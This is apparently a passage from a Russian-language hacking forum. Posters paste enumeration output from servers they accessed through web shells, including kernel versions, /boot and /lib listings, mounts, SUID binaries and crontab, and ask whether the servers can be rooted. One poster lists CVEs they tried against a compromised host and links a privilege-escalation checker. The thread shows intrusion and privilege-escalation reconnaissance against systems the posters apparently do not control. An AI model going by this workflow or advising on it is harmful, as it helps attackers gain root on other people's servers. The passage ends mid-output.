(rw,nosuid,nodev,user=www-data) df -h : Filesystem Size Used Avail Use% Mounted on /dev/sda1 231G 18G 202G 8% / none 1.9G 280K 1.9G 1% /dev none 1.9G 432K 1.9G 1% /dev/shm none 1.9G 116K 1.9G 1% /var/run none 1.9G 0 1.9G 0% /var/lock none 1.9G 0 
1.9G 0% /lib/init/rw cat /etc/issue : Ubuntu 10.04.4 LTS \n \l кронтаб: см. далее cat /proc/version : Linux version 2.6.32-43-generic-pae (buildd@roseapple) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5.1) ) #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012 cat /proc/sys/vm/mmap_min_addr : 65536 pwd : /var/www/login_bak/style ( drwxr----- ) ls -la /usr/bin/staprun : (пусто) find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null : -rwsr-xr-x 1 root root 9724 Feb 19 2010 /sbin/mount.ecryptfs_private -rwsr-xr-- 1 root dip 273312 Mar 7 2010 /usr/sbin/pppd -rwsr-sr-x 1 libuuid libuuid 13848 Jan 21 2011 /usr/sbin/uuidd -rwsr-xr-x 1 root root 18056 Apr 20 2011 /usr/bin/pkexec -rwsr-xr-x 1 root root 127668 Jan 20 2011 /usr/bin/sudo -rwsr-sr-x 1 root root 9672 Jan 19 2012 /usr/bin/X -rwsr-xr-x 1 root lpadmin 13540 Sep 12 2011 /usr/bin/lppasswd -rwsr-xr-x 1 root root 127668 Jan 20 2011 /usr/bin/sudoedit -rwsr-sr-x 1 daemon daemon 42752 Jan 15 2011 /usr/bin/at -rwsr-xr-x 1 root root 52092 Mar 7 2010 /usr/bin/mtr -rwsr-xr-x 1 root root 26356 Feb 2 2010 /usr/bin/fping -rwsr-xr-x 1 root root 53812 Feb 15 2011 /usr/bin/gpasswd -rwsr-xr-x 1 root root 13820 Mar 12 2010 /usr/bin/arping -rwsr-xr-x 1 root root 37140 Feb 15 2011 /usr/bin/passwd -rwsr-xr-x 1 root root 13952 Mar 12 2010 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 31700 Feb 15 2011 /usr/bin/chsh -rwsr-xr-x 1 root root 26388 Feb 2 2010 /usr/bin/fping6 -rwsr-xr-x 1 root root 26784 Feb 15 2011 /usr/bin/newgrp -rwsr-xr-x 1 root root 36180 Feb 15 2011 /usr/bin/chfn -rwsr-xr-x 1 root root 5548 Nov 10 2009 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 9720 Apr 20 2011 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 9676 Jan 22 2011 /usr/lib/pt_chown -rwsr-xr-x 1 root root 13780 Apr 18 2010 /usr/lib/chromium-browser/chromium-browser-sandbox -rwsr-xr-x 1 root root 182464 Jun 17 2011 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 11019 Nov 21 2009 /usr/lib/kde4/libexec/fileshareset
-rwsr-xr-x 1 root root 26456 Mar 12 2010 /bin/ping6 -rwsr-xr-x 1 root root 72188 Jan 21 2011 /bin/mount -rwsr-xr-x 1 root root 31100 Feb 15 2011 /bin/su -rwsr-xr-x 1 root root 34756 Mar 12 2010 /bin/ping -rwsr-xr-x 1 root root 26244 Feb 12 2011 /bin/fusermount -rwsr-xr-x 1 root root 51224 Jan 21 2011 /bin/umount -rwsr-xr-- 1 root messagebus 42492 Jul 23 2011 /lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 14024 Apr 6 2013 /opt/google/chrome/chrome-sandbox -rwsr-sr-x 1 root root 3676623 Jan 10 2010 /opt/AutoScan/bin/autoscan-network-daemon linuxprivchecker.py: http://my-files.ru/zf4cbx Опробованы все эксплоиты из linuxprivchecker, компилятся почти все, не отрабатывает ни один (без ошибок, просто нет результата). Из того, чего в чекере нет: система должна быть подвержена CVE-2014-0196 и CVE-2014-3153, но под первую нет эксплоита на мою версию ядра, эксплоит под вторую не работает. Нарыл две уязвимости этого года, но одна неюзабельна из-за отличающейся версии ОС, вторую (CVE-2015-3202) нет возможности проверить (чтобы узнать, сработало или нет, надо ждать логина в систему из-под рута. С таким админом его можно ждать вечно...). Хелп.
Подскажите пожалуйста по этому серверу Code: ***********uname -a Linux 2.6.32-431.29.2.el6.x86_64 #1 SMP Sun Jul 27 15:55:46 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux **********ls -la /boot total 80526 dr-xr-xr-x. 5 root root 3072 Jul 31 04:15 . dr-xr-xr-x. 29 root root 4096 Jul 31 01:05 .. -rw-r--r-- 1 root root 171 Jul 27 2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac -rw-r--r-- 1 root root 171 Mar 10 17:05 .vmlinuz-2.6.32-504.16.2.el6.x86_64.hmac -rw-r--r-- 1 root root 171 May 29 10:21 .vmlinuz-2.6.32-504.23.4.el6.x86_64.hmac -rw-r--r-- 1 root root 2519815 Jul 27 2014 System.map-2.6.32-431.29.2.el6.x86_64 -rw-r--r-- 1 root root 2545609 Mar 10 17:05 System.map-2.6.32-504.16.2.el6.x86_64 -rw-r--r-- 1 root root 2545975 May 29 10:21 System.map-2.6.32-504.23.4.el6.x86_64 -rw-r--r-- 1 root root 105200 Jul 27 2014 config-2.6.32-431.29.2.el6.x86_64 -rw-r--r-- 1 root root 106313 Mar 10 17:05 config-2.6.32-504.16.2.el6.x86_64 -rw-r--r-- 1 root root 106371 May 29 10:21 config-2.6.32-504.23.4.el6.x86_64 drwxr-xr-x. 3 root root 1024 Oct 25 2013 efi drwxr-xr-x. 2 root root 1024 Jul 21 01:48 grub -rw------- 1 root root 17153340 Nov 6 2014 initramfs-2.6.32-431.29.2.el6.x86_64.img -rw------- 1 root root 19351653 Jun 10 03:45 initramfs-2.6.32-504.16.2.el6.x86_64.img -rw------- 1 root root 19354839 Jul 21 01:48 initramfs-2.6.32-504.23.4.el6.x86_64.img -rw------- 1 root root 5598321 Apr 28 02:44 initrd-2.6.32-431.29.2.el6.x86_64kdump.img drwx------. 
2 root root 12288 Oct 25 2013 lost+found -rw-r--r-- 1 root root 193945 Jul 27 2014 symvers-2.6.32-431.29.2.el6.x86_64.gz -rw-r--r-- 1 root root 200317 Mar 10 17:06 symvers-2.6.32-504.16.2.el6.x86_64.gz -rw-r--r-- 1 root root 200210 May 29 10:22 symvers-2.6.32-504.23.4.el6.x86_64.gz -rwxr-xr-x 1 root root 4132336 Jul 27 2014 vmlinuz-2.6.32-431.29.2.el6.x86_64 -rwxr-xr-x 1 root root 4153296 Mar 10 17:05 vmlinuz-2.6.32-504.16.2.el6.x86_64 -rwxr-xr-x 1 root root 4154992 May 29 10:21 vmlinuz-2.6.32-504.23.4.el6.x86_64 ***************lls -la --full-time /lib sh: lls: command not found *********************ls -la --full-time /lib total 3760 dr-xr-xr-x. 13 root root 4096 2015-07-21 01:47:08.711114108 -0400 . dr-xr-xr-x. 29 root root 4096 2015-07-31 01:05:31.931316783 -0400 .. drwxr-xr-x. 3 root root 4096 2015-01-12 08:24:24.000000000 -0500 alsa lrwxrwxrwx 1 root root 14 2015-01-22 01:39:24.006519825 -0500 cpp -> ../usr/bin/cpp drwxr-xr-x. 3 root root 4096 2015-01-22 01:41:16.608712599 -0500 crda drwxr-xr-x. 44 root root 12288 2015-07-21 01:45:25.921755167 -0400 firmware drwxr-xr-x. 3 root root 4096 2015-05-20 16:46:40.000000000 -0400 i686 drwxr-xr-x. 
6 root root 4096 2013-10-25 03:57:52.000000000 -0400 kbd -rwxr-xr-x 1 root root 141140 2015-05-20 17:12:39.000000000 -0400 ld-2.12.so lrwxrwxrwx 1 root root 10 2015-07-21 01:47:08.518117237 -0400 ld-linux.so.2 -> ld-2.12.so -rwxr-xr-x 1 root root 7220 2015-05-20 17:12:36.000000000 -0400 libBrokenLocale-2.12.so lrwxrwxrwx 1 root root 23 2015-07-21 01:47:08.519117221 -0400 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so -rwxr-xr-x 1 root root 20372 2015-05-20 17:12:40.000000000 -0400 libSegFault.so -rwxr-xr-x 1 root root 13412 2015-05-20 17:12:39.000000000 -0400 libanl-2.12.so lrwxrwxrwx 1 root root 14 2015-07-21 01:47:08.521117189 -0400 libanl.so.1 -> libanl-2.12.so -rwxr-xr-x 1 root root 1902892 2015-05-20 17:12:38.000000000 -0400 libc-2.12.so lrwxrwxrwx 1 root root 12 2015-07-21 01:47:08.641115242 -0400 libc.so.6 -> libc-2.12.so -rwxr-xr-x 1 root root 190988 2015-05-20 17:12:37.000000000 -0400 libcidn-2.12.so lrwxrwxrwx 1 root root 15 2015-07-21 01:47:08.651115080 -0400 libcidn.so.1 -> libcidn-2.12.so -rwxr-xr-x 1 root root 38376 2015-05-20 17:12:40.000000000 -0400 libcrypt-2.12.so lrwxrwxrwx 1 root root 16 2015-07-21 01:47:08.653115048 -0400 libcrypt.so.1 -> libcrypt-2.12.so -rwxr-xr-x 1 root root 17892 2015-05-20 17:12:37.000000000 -0400 libdl-2.12.so lrwxrwxrwx 1 root root 13 2015-07-21 01:47:08.655115016 -0400 libdl.so.2 -> libdl-2.12.so -rw-r--r-- 1 root root 899 2015-01-28 17:12:07.000000000 -0500 libfreebl3.chk -rwxr-xr-x 1 root root 9604 2015-01-28 17:12:06.000000000 -0500 libfreebl3.so -rw-r--r-- 1 root root 899 2015-01-28 17:12:07.000000000 -0500 libfreeblpriv3.chk -rwxr-xr-x 1 root root 378504 2015-01-28 17:12:06.000000000 -0500 libfreeblpriv3.so -rwxr-xr-x 1 root root 120672 2014-09-01 09:11:34.000000000 -0400 libgcc_s-4.4.7-20120601.so.1 lrwxrwxrwx 1 root root 28 2015-01-22 01:41:30.798484873 -0500 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1 -rwxr-xr-x 1 root root 200024 2015-05-20 17:12:36.000000000 -0400 libm-2.12.so lrwxrwxrwx 1 root root 12 
2015-07-21 01:47:08.667114822 -0400 libm.so.6 -> libm-2.12.so -rwxr-xr-x 1 root root 113908 2015-05-20 17:12:39.000000000 -0400 libnsl-2.12.so lrwxrwxrwx 1 root root 14 2015-07-21 01:47:08.674114708 -0400 libnsl.so.1 -> libnsl-2.12.so -rwxr-xr-x 1 root root 40196 2015-05-20 17:12:35.000000000 -0400 libnss_compat-2.12.so lrwxrwxrwx 1 root root 21 2015-07-21 01:47:08.677114659 -0400 libnss_compat.so.2 -> libnss_compat-2.12.so -rwxr-xr-x 1 root root 25592 2015-05-20 17:12:40.000000000 -0400 libnss_dns-2.12.so lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.679114626 -0400 libnss_dns.so.2 -> libnss_dns-2.12.so -rwxr-xr-x 1 root root 58704 2015-05-20 17:12:40.000000000 -0400 libnss_files-2.12.so lrwxrwxrwx 1 root root 20 2015-07-21 01:47:08.682114578 -0400 libnss_files.so.2 -> libnss_files-2.12.so -rwxr-xr-x 1 root root 22136 2015-05-20 17:12:37.000000000 -0400 libnss_hesiod-2.12.so lrwxrwxrwx 1 root root 21 2015-07-21 01:47:08.684114546 -0400 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so -rwxr-xr-x 1 root root 49708 2015-05-20 17:12:37.000000000 -0400 libnss_nis-2.12.so lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.687114497 -0400 libnss_nis.so.2 -> libnss_nis-2.12.so -rwxr-xr-x 1 root root 58708 2015-05-20 17:12:38.000000000 -0400 libnss_nisplus-2.12.so lrwxrwxrwx 1 root root 22 2015-07-21 01:47:08.690114448 -0400 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so -rwxr-xr-x 1 root root 131220 2015-05-20 17:12:35.000000000 -0400 libpthread-2.12.so lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.698114318 -0400 libpthread.so.0 -> libpthread-2.12.so -rwxr-xr-x 1 root root 103384 2015-05-20 17:12:39.000000000 -0400 libresolv-2.12.so lrwxrwxrwx 1 root root 17 2015-07-21 01:47:08.705114205 -0400 libresolv.so.2 -> libresolv-2.12.so -rwxr-xr-x 1 root root 39708 2015-05-20 17:12:36.000000000 -0400 librt-2.12.so lrwxrwxrwx 1 root root 13 2015-07-21 01:47:08.708114156 -0400 librt.so.1 -> librt-2.12.so -rwxr-xr-x 1 root root 31616 2015-05-20 17:12:41.000000000 -0400 libthread_db-1.0.so 
lrwxrwxrwx 1 root root 19 2015-07-21 01:47:08.710114124 -0400 libthread_db.so.1 -> libthread_db-1.0.so -rwxr-xr-x 1 root root 12788 2015-05-20 17:12:40.000000000 -0400 libutil-2.12.so lrwxrwxrwx 1 root root 15 2015-07-21 01:47:08.710114124 -0400 libutil.so.1 -> libutil-2.12.so drwxr-xr-x. 2 root root 4096 2013-10-25 13:09:41.000000000 -0400 lsb dr-xr-xr-x. 5 root root 4096 2015-07-21 01:47:10.410086560 -0400 modules drwxr-xr-x. 3 root root 4096 2015-07-21 01:47:08.730113800 -0400 rtkaio drwxr-xr-x. 2 root root 4096 2014-07-17 11:36:23.000000000 -0400 security drwxr-xr-x. 6 root root 4096 2013-10-25 03:57:01.000000000 -0400 terminfo drwxr-xr-x. 5 root root 4096 2015-01-22 01:39:34.385353241 -0500 udev ********************mount /dev/mapper/VolGroup-lv_root on / type ext4 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) /dev/sda1 on /boot type ext4 (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /etc/named on /var/named/chroot/etc/named type none (rw,bind) /var/named on /var/named/chroot/var/named type none (rw,bind) /usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind) *************************df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup-lv_root 909G 587G 276G 69% / tmpfs 16G 1.1G 15G 7% /dev/shm /dev/sda1 243M 86M 145M 38% /boot sh-4.1$ cat /etc/issue cat /etc/issue Red Hat Enterprise Linux Server release 6.6 (Santiago) Kernel \r on an \m *******************cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... 
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed ****************ls -la cron.d ls: cannot access cron.d: No such file or directory *************ls -la cron.hourly ls: cannot access cron.hourly: No such file or directory **********************ls -la cron.monthly ls: cannot access cron.monthly: No such file or directory ********************ls -la cron.weekly ls: cannot access cron.weekly: No such file or directory ******************cat /proc/version Linux version 2.6.32-431.29.2.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Sun Jul 27 15:55:46 EDT 2014 ******************cat /proc/sys/vm/mmap_min_addr 4096 sh-4.1$ pwd pwd /var/www/vhost//httpdoc/lib ************ls -la /usr/bin/staprun ---s--x--- 1 root stapusr 183072 Jun 23 2014 /usr/bin/staprun ****************** find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/nul sh: /dev/nul: Permission denied
Подскажите пожалуйста, можно ли рутить этот сервер? $ uname -a 2>&1 Code: Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux $ ls -la /boot 2>&1 Code: total 652860 drwxr-xr-x 3 root root 12288 Jun 20 08:15 . drwxr-xr-x 24 root root 4096 Jun 16 08:07 .. -rw------- 1 root root 3372643 May 3 2014 System.map-3.13.0-24-generic -rw------- 1 root root 3378267 Jun 5 2014 System.map-3.13.0-29-generic -rw------- 1 root root 3378641 Jul 5 2014 System.map-3.13.0-30-generic -rw------- 1 root root 3381262 Jul 15 2014 System.map-3.13.0-32-generic -rw------- 1 root root 3381262 Jul 29 2014 System.map-3.13.0-33-generic -rw------- 1 root root 3381262 Aug 13 2014 System.map-3.13.0-34-generic -rw------- 1 root root 3386444 Aug 15 2014 System.map-3.13.0-35-generic -rw------- 1 root root 3386479 Sep 4 2014 System.map-3.13.0-36-generic -rw------- 1 root root 3386945 Sep 23 2014 System.map-3.13.0-37-generic -rw------- 1 root root 3386936 Oct 28 2014 System.map-3.13.0-39-generic -rw------- 1 root root 3387231 Nov 13 2014 System.map-3.13.0-40-generic -rw------- 1 root root 3388792 Nov 25 2014 System.map-3.13.0-41-generic -rw------- 1 root root 3388760 Dec 9 2014 System.map-3.13.0-43-generic -rw------- 1 root root 3388834 Dec 16 2014 System.map-3.13.0-44-generic -rw------- 1 root root 3389458 Mar 11 01:43 System.map-3.13.0-46-generic -rw------- 1 root root 3389235 Mar 12 16:52 System.map-3.13.0-48-generic -rw------- 1 root root 3389437 Apr 11 02:05 System.map-3.13.0-49-generic -rw------- 1 root root 3389875 Apr 15 18:03 System.map-3.13.0-51-generic -rw------- 1 root root 3389875 May 4 10:09 System.map-3.13.0-52-generic -rw------- 1 root root 3390132 May 20 16:11 System.map-3.13.0-53-generic -rw------- 1 root root 3390881 May 27 01:11 System.map-3.13.0-54-generic -rw------- 1 root root 3390881 Jun 18 06:03 System.map-3.13.0-55-generic -rw-r--r-- 1 root root 1158016 May 3 2014 abi-3.13.0-24-generic -rw-r--r-- 1 root root 1161764 
Jun 5 2014 abi-3.13.0-29-generic -rw-r--r-- 1 root root 1162257 Jul 5 2014 abi-3.13.0-30-generic -rw-r--r-- 1 root root 1162712 Jul 15 2014 abi-3.13.0-32-generic -rw-r--r-- 1 root root 1162712 Jul 29 2014 abi-3.13.0-33-generic -rw-r--r-- 1 root root 1162712 Aug 13 2014 abi-3.13.0-34-generic -rw-r--r-- 1 root root 1163858 Aug 15 2014 abi-3.13.0-35-generic -rw-r--r-- 1 root root 1163858 Sep 4 2014 abi-3.13.0-36-generic -rw-r--r-- 1 root root 1164489 Sep 23 2014 abi-3.13.0-37-generic -rw-r--r-- 1 root root 1164547 Oct 28 2014 abi-3.13.0-39-generic -rw-r--r-- 1 root root 1164509 Nov 13 2014 abi-3.13.0-40-generic -rw-r--r-- 1 root root 1164720 Nov 25 2014 abi-3.13.0-41-generic -rw-r--r-- 1 root root 1164720 Dec 9 2014 abi-3.13.0-43-generic -rw-r--r-- 1 root root 1164720 Dec 16 2014 abi-3.13.0-44-generic -rw-r--r-- 1 root root 1164852 Mar 11 01:43 abi-3.13.0-46-generic -rw-r--r-- 1 root root 1164723 Mar 12 16:52 abi-3.13.0-48-generic -rw-r--r-- 1 root root 1164723 Apr 11 02:05 abi-3.13.0-49-generic -rw-r--r-- 1 root root 1164671 Apr 15 18:03 abi-3.13.0-51-generic -rw-r--r-- 1 root root 1164671 May 4 10:09 abi-3.13.0-52-generic -rw-r--r-- 1 root root 1164671 May 20 16:11 abi-3.13.0-53-generic -rw-r--r-- 1 root root 1164806 May 27 01:11 abi-3.13.0-54-generic -rw-r--r-- 1 root root 1164806 Jun 18 06:03 abi-3.13.0-55-generic -rw-r--r-- 1 root root 165510 May 3 2014 config-3.13.0-24-generic -rw-r--r-- 1 root root 165544 Jun 5 2014 config-3.13.0-29-generic -rw-r--r-- 1 root root 165576 Jul 5 2014 config-3.13.0-30-generic -rw-r--r-- 1 root root 165611 Jul 15 2014 config-3.13.0-32-generic -rw-r--r-- 1 root root 165611 Jul 29 2014 config-3.13.0-33-generic -rw-r--r-- 1 root root 165611 Aug 13 2014 config-3.13.0-34-generic -rw-r--r-- 1 root root 165652 Aug 15 2014 config-3.13.0-35-generic -rw-r--r-- 1 root root 165671 Sep 4 2014 config-3.13.0-36-generic -rw-r--r-- 1 root root 165712 Sep 23 2014 config-3.13.0-37-generic -rw-r--r-- 1 root root 165712 Oct 28 2014 
config-3.13.0-39-generic -rw-r--r-- 1 root root 165745 Nov 13 2014 config-3.13.0-40-generic -rw-r--r-- 1 root root 165745 Nov 25 2014 config-3.13.0-41-generic -rw-r--r-- 1 root root 165745 Dec 9 2014 config-3.13.0-43-generic -rw-r--r-- 1 root root 165748 Dec 16 2014 config-3.13.0-44-generic -rw-r--r-- 1 root root 165748 Mar 11 01:43 config-3.13.0-46-generic -rw-r--r-- 1 root root 165773 Mar 12 16:52 config-3.13.0-48-generic -rw-r--r-- 1 root root 165773 Apr 11 02:05 config-3.13.0-49-generic -rw-r--r-- 1 root root 165762 Apr 15 18:03 config-3.13.0-51-generic -rw-r--r-- 1 root root 165762 May 4 10:09 config-3.13.0-52-generic -rw-r--r-- 1 root root 165762 May 20 16:11 config-3.13.0-53-generic -rw-r--r-- 1 root root 165762 May 27 01:11 config-3.13.0-54-generic -rw-r--r-- 1 root root 165762 Jun 18 06:03 config-3.13.0-55-generic drwxr-xr-x 5 root root 4096 Jun 20 08:15 grub -rw-r--r-- 1 root root 19692919 Jun 25 2014 initrd.img-3.13.0-24-generic -rw-r--r-- 1 root root 19693496 Jun 25 2014 initrd.img-3.13.0-29-generic -rw-r--r-- 1 root root 19802843 Jul 10 2014 initrd.img-3.13.0-30-generic -rw-r--r-- 1 root root 19805892 Jul 30 2014 initrd.img-3.13.0-32-generic -rw-r--r-- 1 root root 19806330 Aug 12 2014 initrd.img-3.13.0-33-generic -rw-r--r-- 1 root root 19807084 Aug 14 2014 initrd.img-3.13.0-34-generic -rw-r--r-- 1 root root 19814700 Aug 29 2014 initrd.img-3.13.0-35-generic -rw-r--r-- 1 root root 19827146 Sep 23 2014 initrd.img-3.13.0-36-generic -rw-r--r-- 1 root root 19826914 Oct 9 2014 initrd.img-3.13.0-37-generic -rw-r--r-- 1 root root 19826798 Oct 30 2014 initrd.img-3.13.0-39-generic -rw-r--r-- 1 root root 19831562 Nov 25 2014 initrd.img-3.13.0-40-generic -rw-r--r-- 1 root root 19857194 Dec 11 2014 initrd.img-3.13.0-41-generic -rw-r--r-- 1 root root 19858798 Dec 12 2014 initrd.img-3.13.0-43-generic -rw-r--r-- 1 root root 19860064 Jan 13 2015 initrd.img-3.13.0-44-generic -rw-r--r-- 1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic -rw-r--r-- 1 root root 
19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic -rw-r--r-- 1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic -rw-r--r-- 1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic -rw-r--r-- 1 root root 19865264 May 7 08:07 initrd.img-3.13.0-52-generic -rw-r--r-- 1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic -rw-r--r-- 1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic -rw-r--r-- 1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic -rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin -rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf -rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin -rw------- 1 root root 5776416 May 3 2014 vmlinuz-3.13.0-24-generic -rw------- 1 root root 5792544 Jun 5 2014 vmlinuz-3.13.0-29-generic -rw------- 1 root root 5792608 Jul 5 2014 vmlinuz-3.13.0-30-generic -rw------- 1 root root 5798112 Jul 15 2014 vmlinuz-3.13.0-32-generic -rw------- 1 root root 5798688 Jul 29 2014 vmlinuz-3.13.0-33-generic -rw------- 1 root root 5797728 Aug 13 2014 vmlinuz-3.13.0-34-generic -rw------- 1 root root 5806368 Aug 15 2014 vmlinuz-3.13.0-35-generic -rw------- 1 root root 5806848 Sep 4 2014 vmlinuz-3.13.0-36-generic -rw------- 1 root root 5808832 Sep 23 2014 vmlinuz-3.13.0-37-generic -rw------- 1 root root 5808544 Oct 28 2014 vmlinuz-3.13.0-39-generic -rw------- 1 root root 5808960 Nov 13 2014 vmlinuz-3.13.0-40-generic -rw------- 1 root root 5814112 Nov 25 2014 vmlinuz-3.13.0-41-generic -rw------- 1 root root 5814080 Dec 9 2014 vmlinuz-3.13.0-43-generic -rw------- 1 root root 5814496 Dec 16 2014 vmlinuz-3.13.0-44-generic -rw------- 1 root root 5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic -rw------- 1 root root 5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic -rw------- 1 root root 5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic -rw------- 1 root root 5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic -rw------- 1 root root 5818592 May 4 10:09 vmlinuz-3.13.0-52-generic -rw------- 1 
root root 5821152 May 20 16:11 vmlinuz-3.13.0-53-generic -rw------- 1 root root 5821664 May 27 01:11 vmlinuz-3.13.0-54-generic -rw------- 1 root root 5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic ls -la --full-time /lib 2>&1 Code: total 312 drwxr-xr-x 23 root root 4096 2015-02-27 08:01:04.121244740 +0500 . drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 .. drwxr-xr-x 2 root root 4096 2014-11-21 07:40:33.676606953 +0500 apparmor lrwxrwxrwx 1 root root 21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp drwxr-xr-x 3 root root 4096 2014-06-24 11:04:14.153311413 +0500 crda drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware drwxr-xr-x 2 root root 4096 2014-06-24 11:08:09.613305094 +0500 hdparm drwxr-xr-x 2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu drwxr-xr-x 2 root root 4096 2014-06-27 11:51:14.108394221 +0500 ifupdown drwxr-xr-x 2 root root 4096 2014-07-30 11:27:25.309402444 +0500 init -rwxr-xr-x 1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so lrwxrwxrwx 1 root root 25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0 -rw-r--r-- 1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0 lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0 -rw-r--r-- 1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0 lrwxrwxrwx 1 root root 16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0 -rw-r--r-- 1 root root 5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0 lrwxrwxrwx 1 root root 20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0 -rw-r--r-- 1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0 drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 lsb drwxr-xr-x 2 root 
root 4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d drwxr-xr-x 24 root root 4096 2015-06-16 08:07:17.752507007 +0500 modules drwxr-xr-x 2 root root 4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 plymouth drwxr-xr-x 3 root root 4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode drwxr-xr-x 2 root root 4096 2014-06-27 11:51:03.188394514 +0500 resolvconf drwxr-xr-x 2 root root 4096 2014-07-11 15:54:31.320044515 +0500 security drwxr-xr-x 3 root root 4096 2014-07-10 17:19:11.242226794 +0500 systemd drwxr-xr-x 15 root root 4096 2014-06-24 11:03:45.029312194 +0500 terminfo drwxr-xr-x 4 root root 4096 2014-07-11 15:54:50.304044005 +0500 udev drwxr-xr-x 2 root root 4096 2014-06-24 11:12:34.149297995 +0500 ufw drwxr-xr-x 4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu drwxr-xr-x 2 root root 4096 2014-06-24 11:08:13.173304998 +0500 xtables ls -la --full-time /lib64 2>&1 Code: total 8 drwxr-xr-x 2 root root 4096 2015-02-27 08:01:05.833244694 +0500 . drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 .. 
lrwxrwxrwx 1 root root 32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so $ mount 2>&1 Code: /dev/md0 on / type ext4 (rw,errors=remount-ro) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/cgroup type tmpfs (rw) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755) none on /sys/fs/pstore type pstore (rw) /dev/md1 on /opt type ext4 (rw,usrquota) systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd) $ df -h 2>&1 Code: Filesystem Size Used Avail Use% Mounted on /dev/md0 459G 215G 221G 50% / none 4.0K 0 4.0K 0% /sys/fs/cgroup udev 3.8G 4.0K 3.8G 1% /dev tmpfs 768M 1.8M 767M 1% /run none 5.0M 0 5.0M 0% /run/lock none 